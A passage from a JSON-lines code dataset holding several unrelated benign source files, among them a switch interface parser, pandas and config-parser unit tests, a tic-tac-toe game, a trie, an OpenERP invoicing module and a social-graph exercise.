match.group(\"port_num\")]\n return r\n except self.CLISyntaxError:\n return []\n return []\n\n def execute_cli(self):\n interfaces = []\n gvrp = self.get_gvrp()\n stp = self.get_stp()\n ctp = self.get_ctp()\n oam = self.get_oam()\n snmp_indexes = []\n v = self.cli(\"show snmp mib ifmib ifIndex\")\n for row in parse_table(v, max_width=80):\n snmp_indexes += [\n {\n \"ifindex\": int(row[0].strip()),\n \"ifdescr\": row[1].strip(),\n \"ifname\": row[2].strip(),\n }\n ]\n v = self.cli(\"show interface * status\", cached=True)\n for i in parse_table(v):\n ifname = i[0]\n admin_status = i[1] == \"enabled\"\n oper_status = i[6] != \"Down\"\n iface = {\n \"name\": ifname,\n \"type\": \"physical\",\n \"admin_status\": admin_status,\n \"oper_status\": oper_status,\n \"enabled_protocols\": [],\n \"subinterfaces\": [],\n }\n if ifname in gvrp:\n iface[\"enabled_protocols\"] += [\"GVRP\"]\n if ifname in stp:\n iface[\"enabled_protocols\"] += [\"STP\"]\n if ifname in ctp:\n iface[\"enabled_protocols\"] += [\"CTP\"]\n if ifname in oam:\n iface[\"enabled_protocols\"] += [\"OAM\"]\n # Always enabled\n iface[\"enabled_protocols\"] += [\"LLDP\"]\n for i in snmp_indexes:\n if ifname == i[\"ifname\"]:\n iface[\"snmp_ifindex\"] = i[\"ifindex\"]\n iface[\"description\"] = i[\"ifdescr\"]\n break\n sub = {\n \"name\": ifname,\n \"admin_status\": admin_status,\n \"oper_status\": oper_status,\n \"enabled_afi\": [\"BRIDGE\"],\n \"tagged_vlans\": [],\n }\n s = self.cli(\"show interface %s switchport\" % ifname)\n match1 = self.rx_switchport.search(s)\n if match1.group(\"mode\") == \"access\":\n sub[\"untagged_vlan\"] = int(match1.group(\"access_vlan\"))\n elif match1.group(\"mode\") == \"trunk\":\n sub[\"untagged_vlan\"] = int(match1.group(\"native_vlan\"))\n sub[\"tagged_vlans\"] = self.expand_rangelist(match1.group(\"vlans\").strip())\n elif match1.group(\"mode\") == \"hybrid\":\n sub[\"untagged_vlan\"] = int(match1.group(\"native_vlan\"))\n sub[\"tagged_vlans\"] = self.expand_rangelist(match1.group(\"vlans\").strip())\n match2 = self.rx_hybrid_vlan.search(s)\n if match2:\n sub[\"untagged_vlan\"] = int(match2.group(\"native_vlan\"))\n else:\n raise self.NotSupportedError()\n iface[\"subinterfaces\"] += [sub]\n interfaces += [iface]\n v = self.cli(\"show ip interface brief\")\n for match in self.rx_vlan.finditer(v):\n vlan_id = match.group(\"vlan\")\n ll = self.cli(\"show interface vlan %s\" % vlan_id)\n ifname = \"VLAN%s\" % vlan_id\n match1 = self.rx_link.search(ll)\n iface = {\n \"name\": ifname,\n \"type\": \"SVI\",\n \"admin_status\": True,\n \"oper_status\": \"UP \" in match1.group(\"options\"),\n \"mac\": match1.group(\"mac\"),\n \"subinterfaces\": [\n {\n \"name\": ifname,\n \"admin_status\": True,\n \"oper_status\": \"UP \" in match1.group(\"options\"),\n \"mtu\": match1.group(\"mtu\"),\n \"mac\": match1.group(\"mac\"),\n \"enabled_afi\": [],\n \"vlan_ids\": [int(vlan_id)],\n }\n ],\n }\n match1 = self.rx_ipv4.search(ll)\n if match1:\n iface[\"subinterfaces\"][0][\"enabled_afi\"] += [\"IPv4\"]\n iface[\"subinterfaces\"][0][\"ipv4_addresses\"] = [match1.group(\"ip\")]\n match1 = self.rx_ipv6.search(ll)\n if match1:\n iface[\"subinterfaces\"][0][\"enabled_afi\"] += [\"IPv6\"]\n iface[\"subinterfaces\"][0][\"ipv6_addresses\"] = [match1.group(\"ip\")]\n for i in snmp_indexes:\n if ifname.lower() == i[\"ifname\"].replace(\" \", \"\"):\n iface[\"snmp_ifindex\"] = i[\"ifindex\"]\n iface[\"description\"] = i[\"ifdescr\"]\n break\n interfaces += [iface]\n return [{\"interfaces\": interfaces}]\n","sub_path":"sa/profiles/Upvel/UP/get_interfaces.py","file_name":"get_interfaces.py","file_ext":"py","file_size_in_byte":7640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"394502854","text":"import pytest\n\nfrom pandas._libs.tslibs import frequencies as libfrequencies, resolution\nfrom pandas._libs.tslibs.frequencies import (\n FreqGroup, _period_code_map, get_freq, get_freq_code)\n\nimport pandas.tseries.offsets as offsets\n\n\n@pytest.fixture(params=list(_period_code_map.items()))\ndef period_code_item(request):\n return request.param\n\n\n@pytest.mark.parametrize(\"freqstr,expected\", [\n (\"A\", 1000), (\"3A\", 1000), (\"-1A\", 1000),\n (\"Y\", 1000), (\"3Y\", 1000), (\"-1Y\", 1000),\n (\"W\", 4000), (\"W-MON\", 4001), (\"W-FRI\", 4005)\n])\ndef test_freq_code(freqstr, expected):\n assert get_freq(freqstr) == expected\n\n\ndef test_freq_code_match(period_code_item):\n freqstr, code = period_code_item\n assert get_freq(freqstr) == code\n\n\n@pytest.mark.parametrize(\"freqstr,expected\", [\n (\"A\", 1000), (\"3A\", 1000), (\"-1A\", 1000), (\"A-JAN\", 1000),\n (\"A-MAY\", 1000), (\"Y\", 1000), (\"3Y\", 1000), (\"-1Y\", 1000),\n (\"Y-JAN\", 1000), (\"Y-MAY\", 1000), (offsets.YearEnd(), 1000),\n (offsets.YearEnd(month=1), 1000), (offsets.YearEnd(month=5), 1000),\n (\"W\", 4000), (\"W-MON\", 4000), (\"W-FRI\", 4000), (offsets.Week(), 4000),\n (offsets.Week(weekday=1), 4000), (offsets.Week(weekday=5), 4000),\n (\"T\", FreqGroup.FR_MIN),\n])\ndef test_freq_group(freqstr, expected):\n assert resolution.get_freq_group(freqstr) == expected\n\n\ndef test_freq_group_match(period_code_item):\n freqstr, code = period_code_item\n\n str_group = resolution.get_freq_group(freqstr)\n code_group = resolution.get_freq_group(code)\n\n assert str_group == code_group == code // 1000 * 1000\n\n\n@pytest.mark.parametrize(\"freqstr,exp_freqstr\", [\n (\"D\", \"D\"), (\"W\", \"D\"), (\"M\", \"D\"),\n (\"S\", \"S\"), (\"T\", \"S\"), (\"H\", \"S\")\n])\ndef test_get_to_timestamp_base(freqstr, exp_freqstr):\n tsb = libfrequencies.get_to_timestamp_base\n\n assert tsb(get_freq_code(freqstr)[0]) == get_freq_code(exp_freqstr)[0]\n\n\n_reso = resolution.Resolution\n\n\n@pytest.mark.parametrize(\"freqstr,expected\", [\n (\"A\", \"year\"), (\"Q\", \"quarter\"), (\"M\", \"month\"),\n (\"D\", \"day\"), (\"H\", \"hour\"), (\"T\", \"minute\"),\n (\"S\", \"second\"), (\"L\", \"millisecond\"),\n (\"U\", \"microsecond\"), (\"N\", \"nanosecond\")\n])\ndef test_get_str_from_freq(freqstr, expected):\n assert _reso.get_str_from_freq(freqstr) == expected\n\n\n@pytest.mark.parametrize(\"freq\", [\"A\", \"Q\", \"M\", \"D\", \"H\",\n \"T\", \"S\", \"L\", \"U\", \"N\"])\ndef test_get_freq_roundtrip(freq):\n result = _reso.get_freq(_reso.get_str_from_freq(freq))\n assert freq == result\n\n\n@pytest.mark.parametrize(\"freq\", [\"D\", \"H\", \"T\", \"S\", \"L\", \"U\"])\ndef test_get_freq_roundtrip2(freq):\n result = _reso.get_freq(_reso.get_str(_reso.get_reso_from_freq(freq)))\n assert freq == result\n\n\n@pytest.mark.parametrize(\"args,expected\", [\n ((1.5, \"T\"), (90, \"S\")), ((62.4, \"T\"), (3744, \"S\")),\n ((1.04, \"H\"), (3744, \"S\")), ((1, \"D\"), (1, \"D\")),\n ((0.342931, \"H\"), (1234551600, \"U\")), ((1.2345, \"D\"), (106660800, \"L\"))\n])\ndef test_resolution_bumping(args, expected):\n # see gh-14378\n assert _reso.get_stride_from_decimal(*args) == expected\n\n\n@pytest.mark.parametrize(\"args\", [\n (0.5, \"N\"),\n\n # Too much precision in the input can prevent.\n (0.3429324798798269273987982, \"H\")\n])\ndef test_cat(args):\n msg = \"Could not convert to integer offset at any resolution\"\n\n with pytest.raises(ValueError, match=msg):\n _reso.get_stride_from_decimal(*args)\n\n\n@pytest.mark.parametrize(\"freq_input,expected\", [\n # Frequency string.\n (\"A\", (get_freq(\"A\"), 1)),\n (\"3D\", (get_freq(\"D\"), 3)),\n (\"-2M\", (get_freq(\"M\"), -2)),\n\n # Tuple.\n ((\"D\", 1), (get_freq(\"D\"), 1)),\n ((\"A\", 3), (get_freq(\"A\"), 3)),\n ((\"M\", -2), (get_freq(\"M\"), -2)),\n ((5, \"T\"), (FreqGroup.FR_MIN, 5)),\n\n # Numeric Tuple.\n ((1000, 1), (1000, 1)),\n\n # Offsets.\n (offsets.Day(), (get_freq(\"D\"), 1)),\n (offsets.Day(3), (get_freq(\"D\"), 3)),\n (offsets.Day(-2), (get_freq(\"D\"), -2)),\n (offsets.MonthEnd(), (get_freq(\"M\"), 1)),\n (offsets.MonthEnd(3), (get_freq(\"M\"), 3)),\n (offsets.MonthEnd(-2), (get_freq(\"M\"), -2)),\n (offsets.Week(), (get_freq(\"W\"), 1)),\n (offsets.Week(3), (get_freq(\"W\"), 3)),\n (offsets.Week(-2), (get_freq(\"W\"), -2)),\n (offsets.Hour(), (FreqGroup.FR_HR, 1)),\n\n # Monday is weekday=0.\n (offsets.Week(weekday=1), (get_freq(\"W-TUE\"), 1)),\n (offsets.Week(3, weekday=0), (get_freq(\"W-MON\"), 3)),\n (offsets.Week(-2, weekday=4), (get_freq(\"W-FRI\"), -2)),\n])\ndef test_get_freq_code(freq_input, expected):\n assert get_freq_code(freq_input) == expected\n\n\ndef test_get_code_invalid():\n with pytest.raises(ValueError, match=\"Invalid frequency\"):\n get_freq_code((5, \"baz\"))\n","sub_path":"pandas/tests/tseries/frequencies/test_freq_code.py","file_name":"test_freq_code.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"595922494","text":"\"\"\"\nTests for nearby.config module\n\"\"\"\n\nimport configparser\nimport os\nimport unittest\n\nfrom nearby import config\n\n\nTEST_CONF = os.path.join(os.path.dirname(__file__), 'data', 'test.conf')\n\n\nclass HostBasedConfigParserTestCase(unittest.TestCase):\n\n def setUp(self):\n self.simple = config.HostBasedConfigParser({\n 'host': str,\n 'remote_path': config._path_type,\n 'local_path': config._path_type,\n 'user': config._path_type,\n })\n self.simple.read(config._BASE_CONFIG)\n self.simple.add_section('__user_args__')\n\n self.complex = config.HostBasedConfigParser({\n 'host': str,\n 'remote_path': config._path_type,\n 'local_path': config._path_type,\n 'user': config._path_type,\n })\n self.complex.read([config._BASE_CONFIG, TEST_CONF])\n self.complex.add_section('__user_args__')\n\n def test_that_test_conf_exists(self):\n self.assertTrue(os.path.exists(TEST_CONF))\n\n def test_is_valid_ipv4_wildcard(self):\n good_ipv4_wildcards = [\n '127.0.0.1',\n '127.0.0.*',\n '127.0.*.0',\n '127.0.*.*',\n '127.*.*.*',\n '*.*.*.*',\n ]\n bad_ipv4_wildcards = [\n '*',\n 'anything',\n '',\n '*.*.*', # bad octet value\n '127.0.*', # not enough octets\n '256.*.*.*', # bad octet value\n ]\n for wildcard in good_ipv4_wildcards:\n self.assertTrue(\n self.simple._is_valid_ipv4_wildcard(wildcard))\n for wildcard in bad_ipv4_wildcards:\n self.assertFalse(\n self.simple._is_valid_ipv4_wildcard(wildcard))\n\n def test_transform_with_specificity(self):\n test_strs_to_expected = {\n '127.0.0.1': (r'^127\\.0\\.0\\.1$', 4),\n '127.0.0.*': (r'^127\\.0\\.0\\.\\d{1,3}$', 3),\n '127.0.*.*': (r'^127\\.0\\.\\d{1,3}\\.\\d{1,3}$', 2),\n '127.*.*.*': (r'^127\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$', 1),\n '*.*.*.*': (r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$', 0),\n '*': (r'^.*$', 0),\n 'bitbucket.org': (r'^bitbucket\\.org$', 0),\n '*.bitbucket.org': (r'^.*\\.bitbucket\\.org$', 0),\n '*.*.bitbucket.org': (r'^.*\\..*\\.bitbucket\\.org$', 0),\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._transform_with_specificity(test_str)\n self.assertEqual(actual, expected)\n\n def test_get_ipv4_specificity(self):\n test_strs_to_expected = {\n '127.0.0.1': 4,\n '127.0.0.*': 3,\n '127.0.*.1': 3,\n '127.0.*.*': 2,\n '127.*.*.*': 1,\n '*.*.*.*': 0,\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._get_ipv4_specificity(test_str)\n self.assertEqual(actual, expected)\n\n def test_get_hostname_specificity(self):\n test_strs_to_expected = {\n 'anything': 0,\n '*': 0,\n '*anything*': 0,\n '*.bitbucket.org': 0,\n 'bitbucket.org': 0,\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._get_hostname_specificity(test_str)\n self.assertEqual(actual, expected)\n\n def test_transform_ipv4_pattern(self):\n test_strs_to_expected = {\n '127.0.0.1': r'^127\\.0\\.0\\.1$',\n '127.0.0.*': r'^127\\.0\\.0\\.\\d{1,3}$',\n '127.0.*.*': r'^127\\.0\\.\\d{1,3}\\.\\d{1,3}$',\n '127.*.*.*': r'^127\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$',\n '*.*.0.*': r'^\\d{1,3}\\.\\d{1,3}\\.0\\.\\d{1,3}$',\n '*.*.*.*': r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$',\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._transform_ipv4_pattern(test_str)\n self.assertEqual(actual, expected)\n\n def test_transform_hostname_pattern(self):\n test_strs_to_expected = {\n 'nativedev': '^nativedev$',\n '*nativedev*': '^.*nativedev.*$',\n '*': '^.*$',\n '*.bitbucket.org': '^.*\\.bitbucket\\.org$',\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._transform_hostname_pattern(test_str)\n self.assertEqual(actual, expected)\n\n def test_simple_get_specificity_list(self):\n test_strs_to_expected = {\n 'nativedev': ['__user_args__'],\n '10.0.3.123': ['__user_args__']\n }\n for test_str, expected in test_strs_to_expected.items():\n actual = self.simple._get_specificity_list(test_str)\n self.assertEqual(actual, expected)\n\n def test_complex_get_specificity_list(self):\n test_strs_to_expected = {\n 'nativedev': [\n # TODO: add specificity logic for hostnames\n '__user_args__',\n 'host *',\n 'host nativedev 10.0.3.123',\n ],\n '10.0.3.123': [\n '__user_args__',\n 'host nativedev 10.0.3.123',\n 'host 10.0.3.*',\n 'host 10.0.*.*',\n 'host 10.*.*.*',\n # TODO: make all ipv4 wildcards more specific\n # than non-ipv4 wildcards\n 'host *',\n 'host *.*.*.*',\n ],\n '10.0.3.255': [\n '__user_args__',\n 'host 10.0.3.*',\n 'host 10.0.*.*',\n 'host 10.*.*.*',\n 'host *',\n 'host *.*.*.*',\n ],\n '10.0.255.255': [\n '__user_args__',\n 'host 10.0.*.*',\n 'host 10.*.*.*',\n 'host *',\n 'host *.*.*.*',\n ],\n '10.255.255.255': [\n '__user_args__',\n 'host 10.*.*.*',\n 'host *',\n 'host *.*.*.*',\n ],\n '255.255.255.255': [\n '__user_args__',\n 'host *',\n 'host *.*.*.*',\n ],\n 'github.bitbucket.org': [\n '__user_args__',\n 'host *',\n ],\n 'bitbucket.org': [\n '__user_args__',\n 'host bitbucket.org',\n 'host *',\n ]\n }\n for test_str, expected in test_strs_to_expected.items():\n # TODO: returning specificity list in increasing order\n # is leading to kludgy code in a couple of places. fix it\n actual = list(\n reversed(self.complex._get_specificity_list(test_str)))\n self.assertEqual(actual, expected)\n\n def test_has_own_option(self):\n with self.assertRaises(configparser.NoSectionError):\n self.simple.has_own_option('fictional', 'irrelevant')\n with self.assertRaises(configparser.NoSectionError):\n self.complex.has_own_option('fictional', 'irrelevant')\n self.assertTrue(self.complex.has_own_option('host 10.0.3.*', 'user'))\n self.assertFalse(self.complex.has_own_option('host 10.*.*.*', 'user'))\n\n def test_simple_get_option(self):\n self.assertEqual(\n self.simple.get_option('10.0.3.123', 'remote_path'), '/')\n # failure modes\n with self.assertRaises(configparser.NoOptionError):\n self.simple.get_option('10.0.3.123', 'fictional')\n with self.assertRaises(configparser.NoOptionError):\n self.simple.get_option('10.0.3.123', 'random_setting')\n\n def test_complex_get_option(self):\n # if these don't error out then cascading works properly\n self.complex.get_option('10.0.3.123', 'random_setting')\n self.complex.get_option('10.0.3.123', 'another_setting')\n self.complex.get_option('10.0.3.123', 'yet_another_setting')\n self.complex.get_option('10.0.3.123', 'still_yet_another_setting')\n\n self.assertEqual(\n self.complex.get_option('10.0.3.123', 'random_setting'),\n 'specificitydependsonhostarg')\n with self.assertRaises(configparser.NoOptionError):\n self.complex.get_option('10.0.3.123', 'fictional')\n with self.assertRaises(configparser.NoOptionError):\n self.complex.get_option('10.0.3.124', 'random_setting')\n\n\nclass InitConfigTestCase(unittest.TestCase):\n \"\"\"\n These are stupid tests.\n \"\"\"\n\n def tearDown(self):\n config.delete_config()\n\n def test_no_user_args(self):\n config.init_config()\n\n def test_empty_user_args(self):\n config.init_config({})\n\n def test_with_user_args(self):\n config.init_config({'something': 'with a value'})\n\n def test_with_bad_user_args(self):\n with self.assertRaises(TypeError):\n config.init_config(object())\n\n\nclass GetOptionTestCase(unittest.TestCase):\n\n def tearDown(self):\n config.delete_config()\n\n def test_get_nonexistant_option(self):\n config.init_config()\n with self.assertRaises(configparser.NoOptionError):\n config.get_option('10.0.3.123', 'fictional')\n\n def test_get_existing_option(self):\n config.init_config()\n expected = os.path.expandvars('$USER')\n actual = config.get_option('10.0.3.123', 'user')\n self.assertEqual(actual, expected)\n\n def test_get_user_arg_option(self):\n config.init_config({'not fictional': 'but real'})\n expected = 'but real'\n actual = config.get_option('10.0.3.123', 'not fictional')\n self.assertEqual(actual, expected)\n\n def test_get_option_without_init_config(self):\n with self.assertRaises(Exception):\n config.get_option('10.0.3.123', 'user')\n","sub_path":"tests/test_config.py","file_name":"test_config.py","file_ext":"py","file_size_in_byte":9828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"544870091","text":"import random\n\ndef ask_symbol():\n symbol = input('> Quel symbole voulez-vous ? X ou O ')\n return symbol\n\n\ndef play_again():\n another = input('> Voules-vous rejouer ? yes / no ')\n return another.lower().startswith('y')\n\n\ndef show_board(board):\n print(board[6] + \"|\" + board[7] + \"|\" + board[8])\n print(\"-\" * 5)\n print(board[3] + \"|\" + board[4] + \"|\" + board[5])\n print(\"-\" * 5)\n print(board[0] + \"|\" + board[1] + \"|\" + board[2])\n\n\ndef plays_first():\n coin_toss = random.randint(0, 1)\n return coin_toss\n\n\ndef make_move(board, symbol, position):\n board[position] = symbol\n return board\n\ndef get_human_move():\n move = input('Quel coup voulez vous jouer ? ')\n return int(move)\n\ndef is_won(board):\n bool_result1 = (board[0] == board[1] == board[2] != ' ')\n bool_result2 = (board[3] == board[4] == board[5] != ' ')\n bool_result3 = (board[6] == board[7] == board[8] != ' ')\n bool_result4 = (board[0] == board[3] == board[6] != ' ')\n bool_result5 = (board[1] == board[4] == board[7] != ' ')\n bool_result6 = (board[2] == board[5] == board[8] != ' ')\n bool_result7 = (board[0] == board[4] == board[8] != ' ')\n bool_result8 = (board[6] == board[4] == board[2] != ' ')\n bool_result = bool_result1 | bool_result2 | bool_result3\n bool_result = bool_result | bool_result4 | bool_result5\n bool_result = bool_result | bool_result6 | bool_result7\n bool_result = bool_result | bool_result8\n return bool_result\n\ndef is_tie(board):\n bool_tie = ' ' not in board\n return bool_tie\n\ndef get_comp_move(board):\n position = board.index(' ')\n return position\n\n\ndef human_plays(board, h_symbol, c_symbol):\n show_board(board)\n position = get_human_move()\n board = make_move(board, h_symbol, position)\n if is_won(board):\n print(\"Vous avez gagné !!\")\n elif is_tie(board):\n print(\"C'est une égalité :c\")\n else:\n comp_plays(board, h_symbol, c_symbol)\n\ndef comp_plays(board, h_symbol, c_symbol):\n position = get_comp_move(board)\n board = make_move(board, c_symbol, position)\n if is_won(board):\n print(\"L'ordinateur a gagné !!\")\n elif is_tie(board):\n print(\"C'est une égalité :c\")\n else:\n human_plays(board, h_symbol, c_symbol)\n\n\ndef play_game():\n human_symbol = ask_symbol()\n if human_symbol == 'X':\n comp_symbol = 'O'\n else:\n comp_symbol = 'X'\n who_plays_first = ['X', 'O'][plays_first()]\n board = [' '] * 9\n if who_plays_first == human_symbol:\n human_plays(board, human_symbol, comp_symbol)\n else:\n comp_plays(board, human_symbol, comp_symbol)\n\n\n\n\n\n\n\nif __name__ == '__main__':\n play_game()\n","sub_path":"session-01.py","file_name":"session-01.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"280436493","text":"# 生产者 -- 任务,函数\n# 1. 这个函数 必须要让celery的实例的 task装饰器 装饰\n# 2. 需要celery 自动检测指定包的任务\nfrom django.core.mail import send_mail\nfrom celery_tasks.main import app\n\n\n@app.task\ndef celery_send_email(subject, message, from_email, recipient_list, html_message):\n send_mail(subject=subject,\n message=message,\n from_email=from_email,\n recipient_list=recipient_list,\n html_message=html_message)\n","sub_path":"meiduo_mall/celery_tasks/email/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"295116439","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Description: trie 即前缀树或字典树,利用字符串公共前缀降低搜索时间,时间复杂度为 O(n),\n n 为输入字符串的长度\n\n 核心思想:空间换时间。\n 典型应用:用于统计和排序大量的字符串(单不限于字符串),优点是最大限度减少无所谓的字符串比较,查询效率比哈希表高。\n\n 基本性质:\n - 根节点不包含字符,除根节点外每一个节点都只包含一个字符或字符串\n - 从根节点到某一个节点,路径上经过的字符链接起来,为该节点对应的字符串\n - 每个节点的所有子节点包含的字符都不相同\n\n 本质上,trie 是一颗存储多个字符串的树。\n\n\n 从 trie 树谈到后缀树:https://blog.csdn.net/v_july_v/article/details/6897097\n\n\"\"\"\n\n\n# 自定义指针\nclass TrieNode:\n def __init__(self):\n self.nodes = dict() # 构建字典\n self.is_leaf = False\n\n\nclass Trie(object):\n def __init__(self):\n self.root = TrieNode()\n\n def insert(self, word: str):\n current = self.root\n for char in word:\n if char not in current.nodes:\n current.nodes[char] = TrieNode()\n current = current.nodes[char]\n current.is_leaf = True\n\n def insert_many(self, words: [str]):\n for word in words:\n self.insert(word)\n\n def search_exact(self, word: str):\n \"\"\"精确查找\"\"\"\n current = self.root\n for char in word:\n if current.nodes.get(char) is None:\n return False\n else:\n print(char)\n current = current.nodes[char]\n if current.is_leaf:\n return True\n\n def search_fuzzy(self, word: str):\n \"\"\"模糊查找\"\"\"\n current = self.root\n for char in word:\n if current.nodes.get(char) is None:\n return False\n else:\n print(char)\n if current.nodes[char].is_leaf:\n return True\n else:\n current = current.nodes[char]\n return True\n\n\nif __name__ == '__main__':\n tr = Trie()\n tr.insert(\"child\")\n ret = tr.search_exact(\"child\")\n print(ret)\n\n ret = tr.search_fuzzy(\"children\")\n print(ret)\n","sub_path":"Data_Structures-and-Algorithm/data_structure_code/trie/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"522876596","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 Tiny SPRL ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n##############################################################################\n# Generated by the OpenERP plugin for Dia !\nfrom osv import fields,osv\n\nclass account_invoice(osv.osv):\n \"\"\"Facturation avec notion d'index de lecture de compteur.\"\"\"\n _inherit = 'account.invoice'\n _columns = {\n 'index_start': fields.float('Index Debut'),\n 'index_end': fields.float('Index fin'),\n 'index_start_elec': fields.float('Index Electricite Debut'),\n 'index_end_elec': fields.float('Index Electricite fin'),\n 'room_area': fields.float('Surface Appartement', help='Surface attribue au client'),\n 'global_bill_water': fields.float('Facture Globale Eau', help='Montant de la facture a repartir'),\n 'global_bill_elec': fields.float('Facture Globale Electricite', help='Montant de la facture a repartir'),\n 'global_bill_elec_qty':fields.float('Qte Globale Electricite', help='Montant de la consommation a repartir'),\n 'building_area': fields.float('Surface Batiment'),\n 'consommation':fields.float('Consommation Eau Calcule'),\n 'total_building_area': fields.float('Surface Enceinte'),\n \n }\n def index_change(self, cr, uid, ids,context=None):\n invoice_line_obj=self.pool.get('account.invoice.line')\n invoice_obj=self.pool.get('account.invoice')\n for invoice in self.browse(cr,uid,ids):\n for line in invoice.invoice_line:\n if line.product_id.name=='Consommation':\n if line.type=='ele':\n quantity=invoice.index_end_elec-invoice.index_start_elec\n pu=invoice.global_bill_elec/invoice.global_bill_elec_qty\n val={'quantity':quantity,'price_unit':pu}\n else:\n quantity=invoice.index_end-invoice.index_start\n val={'quantity':quantity}\n inv_qty=quantity\n else:\n if line.type=='eau':\n quantity=invoice.index_end-invoice.index_start\n if line.product_id.name=='Redevance':\n quantity=1\n pu=invoice.global_bill_water/invoice.building_area*invoice.room_area\n val={'quantity':quantity,'price_unit':pu}\n else:\n val={'quantity':quantity}\n else:\n quantity=invoice.index_end_elec-invoice.index_start_elec\n if line.base:\n pu=line.base/invoice.total_building_area*invoice.room_area\n quantity=1\n val={'quantity':quantity,'price_unit':pu}\n invoice_line_obj.write(cr,uid,line.id,val)\n invoice_obj.write(cr,uid,invoice.id,{'consommation':inv_qty})\n invoice.button_reset_taxes()\n return True\naccount_invoice()\n\nclass account_invoice_line(osv.osv):\n \"\"\"Facturation avec notion d'index de lecture de compteur.\"\"\"\n _inherit = 'account.invoice.line'\n _columns = {\n 'type':fields.selection((('eau','Eau'),('ele','Electricite')),'Type'),\n 'base':fields.float('Base de calcul'),\n }\n\naccount_invoice_line()\n","sub_path":"extra-addons/account_invoice_surface_index/account_invoice_surface_index.py","file_name":"account_invoice_surface_index.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"242255601","text":"import random\nimport time\nimport sys\nsys.path.append('../graph')\nfrom util import Queue\n\n\nclass User:\n def __init__(self, name):\n self.name = name\n\n\nclass SocialGraph:\n def __init__(self):\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n def add_friendship(self, user_id, friend_id):\n \"\"\"\n Creates a bi-directional friendship\n \"\"\"\n if user_id == friend_id:\n # print(\"WARNING: You cannot be friends with yourself\")\n return False\n elif friend_id in self.friendships[user_id] or user_id in self.friendships[friend_id]:\n # print(\"WARNING: Friendship already exists\")\n return False\n else:\n self.friendships[user_id].add(friend_id)\n self.friendships[friend_id].add(user_id)\n return True\n\n def add_user(self, name):\n \"\"\"\n Create a new user with a sequential integer ID\n \"\"\"\n self.last_id += 1 # automatically increment the ID to assign the new user\n self.users[self.last_id] = User(name)\n self.friendships[self.last_id] = set()\n\n def populate_graph(self, num_users, avg_friendships):\n \"\"\"\n Takes a number of users and an average number of friendships\n as arguments\n\n Creates that number of users and a randomly distributed friendships\n between those users.\n\n The number of users must be greater than the average number of friendships.\n \"\"\"\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n # !!!! IMPLEMENT ME\n\n # Add users\n # Write a for loop that calls create user the right amount of times\n for i in range(num_users):\n self.add_user(f\"User {i + 1}\")\n\n # Create friendships\n # To create N random friendships, you could create a list with all\n # possible friendship combinations, shuffle the list, then grab the\n # first N elements from the list.\n possible_friendships = []\n for user_id in self.users:\n for friend_id in range(user_id + 1, self.last_id + 1):\n possible_friendships.append((user_id, friend_id))\n\n random.shuffle(possible_friendships)\n\n # Create N friendships where N = avg_friendships * num_users // 2\n # avg_friendships = total_friendships / num_users\n # total_friendships = avg_friendships * num_users\n for i in range(num_users * avg_friendships // 2):\n friendship = possible_friendships[i]\n self.add_friendship(friendship[0], friendship[1])\n\n def populate_graph_linear(self, num_users, avg_friendships):\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n # Add users\n # Write a for loop that calls create user the right amount of times\n for i in range(num_users):\n self.add_user(f\"User {i+1}\")\n\n target_friendships = num_users * avg_friendships\n total_friendships = 0\n collisions = 0\n while total_friendships < target_friendships:\n # Pick a random user\n user_id = random.randint(1, num_users)\n # Pick another random user\n friend_id = random.randint(1, num_users)\n # Try to create the friendship\n if self.add_friendship(user_id, friend_id):\n # If it works, increment a counter\n total_friendships += 2\n else:\n # If not, try again\n collisions += 1\n print(f\"NUM COLLISIONS: {collisions}\")\n\n def get_all_social_paths(self, user_id):\n \"\"\"\n Takes a user's user_id as an argument\n\n Returns a dictionary containing every user in that user's\n extended network with the shortest friendship path between them.\n\n The key is the friend's ID and the value is the path.\n \"\"\"\n visited = {} # Note that this is a dictionary, not a set\n # !!!! IMPLEMENT ME\n\n # QUEUE\n # Create a queue\n q = Queue()\n # Enqueue A PATH TO the starting vertex\n q.enqueue([user_id])\n # While the queue is not empty...\n while q.size() > 0:\n # Dequeue the first PATH\n path = q.dequeue()\n # GRAB THE LAST ID FROM THE END OF THE PATH\n last_id = path[-1]\n # Check if it's been visited\n # If it hasn't been visited...\n if last_id not in visited:\n # Mark it as 